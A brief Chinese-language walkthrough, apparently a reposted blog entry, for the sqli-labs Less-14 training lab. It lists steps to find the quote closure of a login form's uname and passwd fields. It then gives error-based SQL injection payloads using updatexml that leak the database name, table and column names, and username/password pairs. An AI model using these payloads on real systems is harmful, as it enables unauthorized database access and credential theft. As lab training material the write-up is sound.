sqli-labs靶场Less-14
作者:互联网
1、访问首页,/Less-14/index.php,这里的传参点是表单中的uname、passwd
探测六步
- 判断是否是数字形传参
- 判断是否有单引号闭合
- 判断是否是双引号闭合
- 判断是否单引号+括号闭合
- 判断是否是双引号+括号闭合
- 判断是否是延时盲注
2、使用报错注入获取库名
" and updatexml(1,concat(0x7e,(select database())),1) -- qwe
3、获取表名
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1)-- qwe
4、获取字段名
admin" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),1) -- qwe
5、获取数据
" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 2,1)),1)-- qwe
标签:14,--,qwe,0x7e,labs,sqli,select,updatexml,concat 来源: https://blog.csdn.net/songling515010475/article/details/119914836